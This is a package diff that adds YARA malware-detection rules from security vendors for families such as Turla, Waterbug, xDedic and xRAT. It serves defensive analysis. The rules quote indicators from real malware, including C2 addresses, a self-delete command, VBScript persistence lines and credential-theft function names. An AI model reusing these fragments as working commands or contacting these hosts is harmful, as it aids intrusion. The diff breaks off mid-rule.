--- remnux-rules-0.0.3/yara/malware/Turla.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Turla.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,21 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule WaterBug_turla_dll 
+{
+    meta:
+        description = "Symantec Waterbug Attack - Trojan Turla DLL"
+        author = "Symantec Security Response"
+        date = "22.01.2015"
+        reference = "http://www.symantec.com/connect/blogs/turla-spying-tool-targets-governments-and-diplomats"   
+
+    strings:
+        $a = /([A-Za-z0-9]{2,10}_){,2}Win32\.dll\x00/
+   
+    condition:
+        pe.exports("ee") and $a
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Urausy.yar remnux-rules-0.0.4/yara/malware/Urausy.yar
--- remnux-rules-0.0.3/yara/malware/Urausy.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Urausy.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,21 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule urausy_skype_dat {
+	meta:
+		author = "AlienVault Labs"
+		description = "Yara rule to match against memory of processes infected by Urausy skype.dat"
+	strings:
+		$a = "skype.dat" ascii wide
+		$b = "skype.ini" ascii wide
+		$win1 = "CreateWindow"
+		$win2 = "YIWEFHIWQ" ascii wide
+		$desk1 = "CreateDesktop"
+		$desk2 = "MyDesktop" ascii wide
+	condition:
+		$a and $b and (all of ($win*) or all of ($desk*))
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Vidgrab.yar remnux-rules-0.0.4/yara/malware/Vidgrab.yar
--- remnux-rules-0.0.3/yara/malware/Vidgrab.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Vidgrab.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,53 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule VidgrabCode : Vidgrab Family 
+{
+    meta:
+        description = "Vidgrab code tricks"
+        author = "Seth Hardy"
+        last_modified = "2014-06-20"
+        
+    strings:
+        $divbyzero = { B8 02 00 00 00 48 48 BA 02 00 00 00 83 F2 02 F7 F0 }
+        // add eax, ecx; xor byte ptr [eax], ??h; inc ecx
+        $xorloop = { 03 C1 80 30 (66 | 58) 41 }
+        $junk = { 8B 4? ?? 8B 4? ?? 03 45 08 52 5A }
+        
+    condition:
+        all of them
+}
+
+rule VidgrabStrings : Vidgrab Family
+{
+    meta:
+        description = "Vidgrab Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-06-20"
+        
+    strings:
+        $ = "IDI_ICON5" wide ascii
+        $ = "starter.exe"
+        $ = "wmifw.exe"
+        $ = "Software\\rar"
+        $ = "tmp092.tmp"
+        $ = "temp1.exe"
+        
+    condition:
+       3 of them
+}
+
+rule Vidgrab : Family
+{
+    meta:
+        description = "Vidgrab"
+        author = "Seth Hardy"
+        last_modified = "2014-06-20"
+        
+    condition:
+        VidgrabCode or VidgrabStrings
+}
diff -Nru remnux-rules-0.0.3/yara/malware/W32_NionSpy.yar remnux-rules-0.0.4/yara/malware/W32_NionSpy.yar
--- remnux-rules-0.0.3/yara/malware/W32_NionSpy.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/W32_NionSpy.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,16 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule NionSpy
+{
+meta:
+description = "Triggers on old and new variants of W32/NionSpy file infector"
+reference = "https://blogs.mcafee.com/mcafee-labs/taking-a-close-look-at-data-stealing-nionspy-file-infector"
+strings:
+$variant2015_infmarker = "aCfG92KXpcSo4Y94BnUrFmnNk27EhW6CqP5EnT"
+$variant2013_infmarker = "ad6af8bd5835d19cc7fdc4c62fdf02a1"
+$variant2013_string = "%s?cstorage=shell&comp=%s"
+condition:
+uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and 1 of ($variant*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Wabot.yar remnux-rules-0.0.4/yara/malware/Wabot.yar
--- remnux-rules-0.0.3/yara/malware/Wabot.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Wabot.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,18 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule Wabot : Worm
+{
+	meta:
+		author="Kevin Falcoz"
+		date="14/08/2015"
+		description="Wabot Trojan Worm"
+
+	strings:
+		$signature1={43 3A 5C 6D 61 72 69 6A 75 61 6E 61 2E 74 78 74}
+		$signature2={73 49 52 43 34}
+
+	condition:
+		$signature1 and $signature2
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Warp.yar remnux-rules-0.0.4/yara/malware/Warp.yar
--- remnux-rules-0.0.3/yara/malware/Warp.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Warp.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,48 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule WarpCode : Warp Family 
+{
+    meta:
+        description = "Warp code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-10"
+    
+    strings:
+        // character replacement
+        $ = { 80 38 2B 75 03 C6 00 2D 80 38 2F 75 03 C6 00 5F }
+    
+    condition:
+        any of them
+}
+
+rule WarpStrings : Warp Family
+{
+    meta:
+        description = "Warp Identifying Strings"
+        author = "Seth Hardy"
+        last_modified = "2014-07-10"
+        
+    strings:
+        $ = "/2011/n325423.shtml?"
+        $ = "wyle"
+        $ = "\\~ISUN32.EXE"
+
+    condition:
+       any of them
+}
+
+rule Warp : Family
+{
+    meta:
+        description = "Warp"
+        author = "Seth Hardy"
+        last_modified = "2014-07-10"
+        
+    condition:
+        WarpCode or WarpStrings
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Waterbug.yar remnux-rules-0.0.4/yara/malware/Waterbug.yar
--- remnux-rules-0.0.3/yara/malware/Waterbug.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Waterbug.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,100 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule WaterBug_wipbot_2013_core_PDF {
+	meta:
+		description = "Symantec Waterbug Attack - Trojan.Wipbot 2014 core PDF"
+		author = "Symantec Security Response"
+		date = "22.01.2015"
+		reference = "http://t.co/rF35OaAXrl"
+	strings:
+		$PDF = "%PDF-"
+		$a = /\+[A-Za-z]{1}\. _ _ \$\+[A-Za-z]{1}\. _ \$ _ \+/ 
+		$b = /\+[A-Za-z]{1}\.\$\$\$ _ \+/
+	condition:
+		($PDF at 0) and #a > 150 and #b > 200
+}
+
+rule WaterBug_wipbot_2013_dll {
+	meta:
+		description = "Symantec Waterbug Attack - Trojan.Wipbot 2014 Down.dll component"
+		author = "Symantec Security Response"
+		date = "22.01.2015"
+		reference = "http://t.co/rF35OaAXrl"		
+	strings:
+		$string1 = "/%s?rank=%s"
+		$string2 = "ModuleStart\x00ModuleStop\x00start"
+		$string3 = "1156fd22-3443-4344-c4ffff"
+		//read file... error..
+		$string4 = "read\x20file\x2E\x2E\x2E\x20error\x00\x00"
+	condition:
+		2 of them
+}
+
+rule WaterBug_wipbot_2013_core {
+	meta:
+		description = "Symantec Waterbug Attack - Trojan.Wipbot core + core; garbage appended data (PDF Exploit leftovers) + wipbot dropper; fake AdobeRd32 Error"
+		author = "Symantec Security Response"
+		date = "22.01.2015"
+		reference = "http://t.co/rF35OaAXrl"			
+	strings:
+		$mz = "MZ"
+		$code1 = { 89 47 0C C7 47 10 90 C2 04 00 C7 47 14 90 C2 10 00 C7 47 18 90 90 60 68 89 4F 1C C7 47 20 90 90 90 B8 89 4F 24 C7 47 28 90 FF D0 61 C7 47 2C 90 C2 04 00}
+		$code2 = { 85 C0 75 25 8B 0B BF ?? ?? ?? ?? EB 17 69 D7 0D 66 19 00 8D BA 5F F3 6E 3C 89 FE C1 EE 10 89 F2 30 14 01 40 3B 43 04 72 E4}
+		$code3 = {90 90 90 ?? B9 00 4D 5A 90 00 03 00 00 00 82 04} $code4 = {55 89 E5 5D C3 55 89 E5 83 EC 18 8B 45 08 85 C0}
+	condition:
+		$mz at 0 and (($code1 or $code2) or ($code3 and $code4))
+}
+
+rule WaterBug_turla_dropper {
+	meta:
+		description = "Symantec Waterbug Attack - Trojan Turla Dropper"
+		author = "Symantec Security Response"
+		date = "22.01.2015"
+		reference = "http://t.co/rF35OaAXrl"
+	strings: 
+		$a = {0F 31 14 31 20 31 3C 31 85 31 8C 31 A8 31 B1 31 D1 31 8B 32 91 32 B6 32 C4 32 6C 33 AC 33 10 34}
+		$b = {48 41 4C 2E 64 6C 6C 00 6E 74 64 6C 6C 00 00 00 57 8B F9 8B 0D ?? ?? ?? ?? ?? C9 75 26 56 0F 20 C6 8B C6 25 FF FF FE FF 0F 22 C0 E8}
+	condition: 
+		all of them
+}
+
+rule WaterBug_fa_malware { 
+	meta: 
+		description = "Symantec Waterbug Attack - FA malware variant"
+		author = "Symantec Security Response"
+		date = "22.01.2015"
+		reference = "http://t.co/rF35OaAXrl"
+	strings:
+		$mz = "MZ"
+		$string1 = "C:\\proj\\drivers\\fa _ 2009\\objfre\\i386\\atmarpd.pdb"
+		$string2 = "d:\\proj\\cn\\fa64\\"
+		$string3 = "sengoku_Win32.sys\x00"
+		$string4 = "rk_ntsystem.c"
+		$string5 = "\\uroboros\\"
+		$string6 = "shell.{F21EDC09-85D3-4eb9-915F-1AFA2FF28153}"
+	condition:
+		($mz at 0) and (any of ($string*))
+}
+
+
+rule WaterBug_sav {
+	meta: 
+		description = "Symantec Waterbug Attack - SAV Malware"
+		author = "Symantec Security Response"
+		date = "22.01.2015"
+		reference = "http://t.co/rF35OaAXrl" 	
+	strings:
+		$mz = "MZ"
+		$code1a = { 8B 75 18 31 34 81 40 3B C2 72 F5 33 F6 39 7D 14 76 1B 8A 04 0E 88 04 0F 6A 0F 33 D2 8B C7 5B F7 F3 85 D2 75 01 }
+		$code1b = { 8B 45 F8 40 89 45 F8 8B 45 10 C1 E8 02 39 45 F8 73 17 8B 45 F8 8B 4D F4 8B 04 81 33 45 20 8B 4D F8 8B 55 F4 89 04 8A EB D7 83 65 F8 00 83 65 EC 00 EB 0E 8B 45 F8 40 89 45 F8 8B 45 EC 40 89 45 EC 8B 45 EC	3B 45 10 73 27 8B 45 F4 03 45 F8 8B 4D F4 03 4D EC 8A 09 88 08 8B 45 F8 33 D2 6A 0F 59 F7 F1 85 D2 75 07 }
+		$code1c = { 8A 04 0F 88 04 0E 6A 0F 33 D2 8B C6 5B F7 F3 85 D2 75 01 47 8B 45 14 46 47 3B F8 72 E3 EB 04 C6 04 08 00 48 3B C6 73 F7 33 C0 C1 EE 02 74 0B 8B 55 18 31 14 81 40 3B C6 72 F5 }
+		$code2 =  { 29 5D 0C 8B D1 C1 EA 05 2B CA 8B 55 F4 2B C3 3D 00 00 00 01 89 0F 8B 4D 10 8D 94 91 00 03 00 00 73 17 8B 7D F8 8B 4D 0C 0F B6 3F C1 E1 08 0B CF C1 E0 08 FF 45 F8 89 4D 0C 8B 0A 8B F8 C1 EF 0B}
+	condition:
+		($mz at 0) and (($code1a or $code1b or $code1c) and $code2) 
+}
+
diff -Nru remnux-rules-0.0.3/yara/malware/Wimmie.yar remnux-rules-0.0.4/yara/malware/Wimmie.yar
--- remnux-rules-0.0.3/yara/malware/Wimmie.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Wimmie.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,52 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule WimmieShellcode : Wimmie Family 
+{
+    meta:
+        description = "Wimmie code features"
+        author = "Seth Hardy"
+        last_modified = "2014-07-17"
+        
+    strings:
+        // decryption loop
+        $ = { 49 30 24 39 83 F9 00 77 F7 8D 3D 4D 10 40 00 B9 0C 03 00 00 }
+        $xordecrypt = {B9 B4 1D 00 00 [8] 49 30 24 39 83 F9 00 }
+        
+    condition:
+        any of them
+}
+
+rule WimmieStrings : Wimmie Family
+{
+    meta:
+        description = "Strings used by Wimmie"
+        author = "Seth Hardy"
+        last_modified = "2014-07-17"
+        
+    strings:
+        $ = "\x00ScriptMan"
+        $ = "C:\\WINDOWS\\system32\\sysprep\\cryptbase.dll" wide ascii
+        $ = "ProbeScriptFint" wide ascii
+        $ = "ProbeScriptKids"
+        
+    condition:
+        any of them
+
+}
+
+rule Wimmie : Family
+{
+    meta:
+        description = "Wimmie family"
+        author = "Seth Hardy"
+        last_modified = "2014-07-17"
+   
+    condition:
+        WimmieShellcode or WimmieStrings
+        
+}
diff -Nru remnux-rules-0.0.3/yara/malware/Win32_Buzus_Softpulse.yar remnux-rules-0.0.4/yara/malware/Win32_Buzus_Softpulse.yar
--- remnux-rules-0.0.3/yara/malware/Win32_Buzus_Softpulse.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/Win32_Buzus_Softpulse.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,28 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+rule Win32_Buzus_Softpulse {
+	meta:
+		description = "Trojan Buzus / Softpulse"
+		author = "Florian Roth"
+		date = "2015-05-13"
+		hash = "2f6df200e63a86768471399a74180466d2e99ea9"
+		score = 75
+	strings:
+		$x1 = "pi4izd6vp0.com" fullword ascii
+
+		$s1 = "SELECT * FROM Win32_Process" fullword wide
+		$s4 = "CurrentVersion\\Uninstall\\avast" fullword wide
+		$s5 = "Find_RepeatProcess" fullword ascii
+		$s6 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\" fullword wide
+		$s7 = "myapp.exe" fullword ascii
+		$s14 = "/c ping -n 1 www.google" wide
+	condition:
+		uint16(0) == 0x5a4d and 
+			( 
+				( $x1 and 2 of ($s*) ) or
+				all of ($s*) 
+			)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/windigo-onimiki.yar remnux-rules-0.0.4/yara/malware/windigo-onimiki.yar
--- remnux-rules-0.0.3/yara/malware/windigo-onimiki.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/windigo-onimiki.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,64 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+// Operation Windigo yara rules
+// For feedback or questions contact us at: windigo@eset.sk
+// https://github.com/eset/malware-ioc/
+//
+// These yara rules are provided to the community under the two-clause BSD
+// license as follows:
+//
+// Copyright (c) 2014, ESET
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions are met:
+//
+// 1. Redistributions of source code must retain the above copyright notice, this
+// list of conditions and the following disclaimer.
+//
+// 2. Redistributions in binary form must reproduce the above copyright notice,
+// this list of conditions and the following disclaimer in the documentation
+// and/or other materials provided with the distribution.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+// AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+// IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+// DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+// FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+// DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+// CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+// OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+//
+rule onimiki
+{
+  meta:
+    description = "Linux/Onimiki malicious DNS server"
+    malware = "Linux/Onimiki"
+    operation = "Windigo"
+    author = "Olivier Bilodeau <bilodeau@eset.com>"
+    created = "2014-02-06"
+    reference = "http://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf"
+    contact = "windigo@eset.sk"
+    source = "https://github.com/eset/malware-ioc/"
+    license = "BSD 2-Clause"
+
+  strings:
+    // code from offset: 0x46CBCD
+    $a1 = {43 0F B6 74 2A 0E 43 0F  B6 0C 2A 8D 7C 3D 00 8D}
+    $a2 = {74 35 00 8D 4C 0D 00 89  F8 41 F7 E3 89 F8 29 D0}
+    $a3 = {D1 E8 01 C2 89 F0 C1 EA  04 44 8D 0C 92 46 8D 0C}
+    $a4 = {8A 41 F7 E3 89 F0 44 29  CF 29 D0 D1 E8 01 C2 89}
+    $a5 = {C8 C1 EA 04 44 8D 04 92  46 8D 04 82 41 F7 E3 89}
+    $a6 = {C8 44 29 C6 29 D0 D1 E8  01 C2 C1 EA 04 8D 04 92}
+    $a7 = {8D 04 82 29 C1 42 0F B6  04 21 42 88 84 14 C0 01}
+    $a8 = {00 00 42 0F B6 04 27 43  88 04 32 42 0F B6 04 26}
+    $a9 = {42 88 84 14 A0 01 00 00  49 83 C2 01 49 83 FA 07}
+
+  condition:
+    all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/wineggdrop.yar remnux-rules-0.0.4/yara/malware/wineggdrop.yar
--- remnux-rules-0.0.3/yara/malware/wineggdrop.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/wineggdrop.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,26 @@
+rule wineggdrop : portscanner
+{
+    meta:
+        author = "Christian Rebischke (@sh1bumi)"
+        date = "2015-09-05"
+        description = "Rules for TCP Portscanner VX.X by WinEggDrop"
+        in_the_wild = true
+        family = "Hackingtool/Portscanner"
+
+    strings:
+        $a = { 54 43 50 20 50 6f 72 74 20 53 63 61 6e 6e 65 72 
+               20 56 3? 2e 3? 20 42 79 20 57 69 6e 45 67 67 44 
+               72 6f 70 0a } 
+        $b = "Result.txt"
+        $c = "Usage:   %s TCP/SYN StartIP [EndIP] Ports [Threads] [/T(N)] [/(H)Banner] [/Save]\n"
+
+    condition:
+        //check for MZ Signature at offset 0
+        uint16(0) == 0x5A4D
+
+        and
+
+        //check for wineggdrop specific strings
+        $a and $b and $c 
+}
+
diff -Nru remnux-rules-0.0.3/yara/malware/WoolenGoldfish.yar remnux-rules-0.0.4/yara/malware/WoolenGoldfish.yar
--- remnux-rules-0.0.3/yara/malware/WoolenGoldfish.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/WoolenGoldfish.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,99 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+
+rule WoolenGoldfish_Sample_1 {
+	meta:
+		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+		author = "Florian Roth"
+		reference = "http://goo.gl/NpJpVZ"
+		date = "2015/03/25"
+		score = 60
+		hash = "7ad0eb113bc575363a058f4bf21dbab8c8f7073a"
+	strings:
+		$s1 = "Cannot execute (%d)" fullword ascii
+		$s16 = "SvcName" fullword ascii
+	condition:
+		all of them
+}
+
+rule WoolenGoldfish_Generic_1 {
+	meta:
+		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+		author = "Florian Roth"
+		reference = "http://goo.gl/NpJpVZ"
+		date = "2015/03/25"
+		score = 90
+		super_rule = 1
+		hash0 = "5d334e0cb4ff58859e91f9e7f1c451ffdc7544c3"
+		hash1 = "d5b2b30fe2d4759c199e3659d561a50f88a7fb2e"
+		hash2 = "a42f1ad2360833baedd2d5f59354c4fc3820c475"
+	strings:
+		$x0 = "Users\\Wool3n.H4t\\"
+		$x1 = "C-CPP\\CWoolger"
+		$x2 = "NTSuser.exe" fullword wide
+
+		$s1 = "107.6.181.116" fullword wide
+		$s2 = "oShellLink.Hotkey = \"CTRL+SHIFT+F\"" fullword
+		$s3 = "set WshShell = WScript.CreateObject(\"WScript.Shell\")" fullword
+		$s4 = "oShellLink.IconLocation = \"notepad.exe, 0\"" fullword
+		$s5 = "set oShellLink = WshShell.CreateShortcut(strSTUP & \"\\WinDefender.lnk\")" fullword
+		$s6 = "wlg.dat" fullword
+		$s7 = "woolger" fullword wide
+		$s8 = "[Enter]" fullword
+		$s9 = "[Control]" fullword
+	condition:
+		( 1 of ($x*) and 2 of ($s*) ) or
+		( 6 of ($s*) )
+}
+
+rule WoolenGoldfish_Generic_2 {
+	meta:
+		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+		author = "Florian Roth"
+		reference = "http://goo.gl/NpJpVZ"
+		date = "2015/03/25"
+		score = 90
+		hash1 = "47b1c9caabe3ae681934a33cd6f3a1b311fd7f9f"
+		hash2 = "62172eee1a4591bde2658175dd5b8652d5aead2a"
+		hash3 = "7fef48e1303e40110798dfec929ad88f1ad4fbd8"
+		hash4 = "c1edf6e3a271cf06030cc46cbd90074488c05564"
+	strings:
+		$s0 = "modules\\exploits\\littletools\\agent_wrapper\\release" ascii
+	condition:
+		all of them
+}
+
+rule WoolenGoldfish_Generic_3 {
+	meta:
+		description = "Detects a operation Woolen-Goldfish sample - http://goo.gl/NpJpVZ"
+		author = "Florian Roth"
+		reference = "http://goo.gl/NpJpVZ"
+		date = "2015/03/25"
+		score = 90
+		hash1 = "86222ef166474e53f1eb6d7e6701713834e6fee7"
+		hash2 = "e8dbcde49c7f760165ebb0cb3452e4f1c24981f5"
+	strings:
+		$x1 = "... get header FATAL ERROR !!!  %d bytes read > header_size" fullword ascii
+		$x2 = "index.php?c=%S&r=%x&u=1&t=%S" fullword wide
+		$x3 = "connect_back_tcp_channel#do_connect:: Error resolving connect back hostname" fullword ascii
+
+		$s0 = "kernel32.dll GetProcAddressLoadLibraryAws2_32.dll" fullword ascii
+		$s1 = "Content-Type: multipart/form-data; boundary=%S" fullword wide
+		$s2 = "Attempting to unlock uninitialized lock!" fullword ascii
+		$s4 = "unable to load kernel32.dll" fullword ascii
+		$s5 = "index.php?c=%S&r=%x" fullword wide
+		$s6 = "%s len:%d " fullword ascii
+		$s7 = "Encountered error sending syscall response to client" fullword ascii
+		$s9 = "/info.dat" fullword ascii
+		$s10 = "Error entering thread lock" fullword ascii
+		$s11 = "Error exiting thread lock" fullword ascii
+		$s12 = "connect_back_tcp_channel_init:: socket() failed" fullword ascii
+	condition:
+		( 1 of ($x*) ) or
+		( 8 of ($s*) )
+}
diff -Nru remnux-rules-0.0.3/yara/malware/xDedic_marketplace.yar remnux-rules-0.0.4/yara/malware/xDedic_marketplace.yar
--- remnux-rules-0.0.3/yara/malware/xDedic_marketplace.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/xDedic_marketplace.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,38 @@
+rule xDedic_SysScan_unpacked {
+meta:
+author = " Kaspersky Lab"
+ref = "https://securelist.com/files/2016/06/xDedic_marketplace_ENG.pdf"
+maltype = "crimeware"
+type ="crimeware"
+filetype = "Win32 EXE"
+date = "2016-03-14"
+version = "1.0"
+hash = "fac495be1c71012682ebb27092060b43"
+hash = "e8cc69231e209db7968397e8a244d104"
+hash = "a53847a51561a7e76fd034043b9aa36d"
+hash = "e8691fa5872c528cd8e72b82e7880e98"
+hash = "F661b50d45400e7052a2427919e2f777"
+strings:
+$a1="/c ping -n 2 127.0.0.1 & del \"SysScan.exe\"" ascii wide
+$a2="SysScan DEBUG Mode!!!" ascii wide
+$a3="This rechecking? (set 0/1 or press enter key)" ascii wide
+$a4="http://37.49.224.144:8189/manual_result" ascii wide
+$b1="Checker end work!" ascii wide
+$b2="Trying send result..." ascii wide
+condition:
+((uint16(0) == 0x5A4D)) and (filesize < 5000000) and
+((any of ($a*)) or (all of ($b*)))
+}
+import "pe"
+rule xdedic_packed_syscan {
+meta:
+author = "Kaspersky Lab"
+company = "Kaspersky Lab"
+ref = "https://securelist.com/files/2016/06/xDedic_marketplace_ENG.pdf"
+strings:
+$a1 = "SysScan.exe" nocase ascii wide
+condition:
+uint16(0) == 0x5A4D
+and any of ($a*) and filesize > 1000000 and filesize <1200000 and
+pe.number_of_sections == 13 and pe.version_info["FileVersion"] contains "1.3.4."
+}
diff -Nru remnux-rules-0.0.3/yara/malware/XOR_DDosv1.yar remnux-rules-0.0.4/yara/malware/XOR_DDosv1.yar
--- remnux-rules-0.0.3/yara/malware/XOR_DDosv1.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/XOR_DDosv1.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,21 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+rule XOR_DDosv1 : DDoS
+{
+  meta:
+    author = "Akamai CSIRT"
+    description = "Rule to detect XOR DDos infection"
+  strings:
+    $st0 = "BB2FA36AAA9541F0"
+    $st1 = "md5="
+    $st2 = "denyip="
+    $st3 = "filename="
+    $st4 = "rmfile="
+    $st5 = "exec_packet"
+    $st6 = "build_iphdr"
+  condition:
+    all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/xRAT20.yar remnux-rules-0.0.4/yara/malware/xRAT20.yar
--- remnux-rules-0.0.3/yara/malware/xRAT20.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/xRAT20.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,44 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+rule xRAT20
+{
+meta:
+	author = "Rottweiler"
+	date = "2015-08-20"
+	description = "Identifies xRAT 2.0 samples"
+	maltype = "Remote Access Trojan"
+	hash0 = "cda610f9cba6b6242ebce9f31faf5d9c"
+	hash1 = "60d7b0d2dfe937ac6478807aa7043525"
+	hash2 = "d1b577fbfd25cc5b873b202cfe61b5b8"
+	hash3 = "1820fa722906569e3f209d1dab3d1360"
+	hash4 = "8993b85f5c138b0afacc3ff04a2d7871"
+	hash5 = "0c231ed8a800b0f17f897241f1d5f4e3"
+	hash1 = "60d7b0d2dfe937ac6478807aa7043525"
+	hash8 = "2c198e3e0e299a51e5d955bb83c62a5e"
+	sample_filetype = "exe"
+	yaragenerator = "https://github.com/Xen0ph0n/YaraGenerator"
+strings:
+	$string0 = "GetDirectory: File not found" wide
+	$string1 = "<>m__Finally8"
+	$string2 = "Secure"
+	$string3 = "ReverseProxyClient"
+	$string4 = "DriveDisplayName"
+	$string5 = "<IsError>k__BackingField"
+	$string6 = "set_InstallPath"
+	$string7 = "memcmp"
+	$string8 = "urlHistory"
+	$string9 = "set_AllowAutoRedirect"
+	$string10 = "lpInitData"
+	$string11 = "reader"
+	$string12 = "<FromRawDataGlobal>d__f"
+	$string13 = "mq.png" wide
+	$string14 = "remove_KeyDown"
+	$string15 = "ProtectedData"
+	$string16 = "m_hotkeys"
+	$string17 = "get_Hour"
+	$string18 = "\\mozglue.dll" wide
+condition:
+	18 of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/xRAT.yar remnux-rules-0.0.4/yara/malware/xRAT.yar
--- remnux-rules-0.0.3/yara/malware/xRAT.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/xRAT.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,28 @@
+rule xRAT
+{
+    meta:
+        author = " Kevin Breen <kevin@techanarchy.net>"
+        date = "2014/04"
+        ref = "http://malwareconfig.com/stats/xRat"
+        maltype = "Remote Access Trojan"
+        filetype = "exe"
+
+    strings:
+        $v1a = "DecodeProductKey"
+        $v1b = "StartHTTPFlood"
+        $v1c = "CodeKey"
+        $v1d = "MESSAGEBOX"
+        $v1e = "GetFilezillaPasswords"
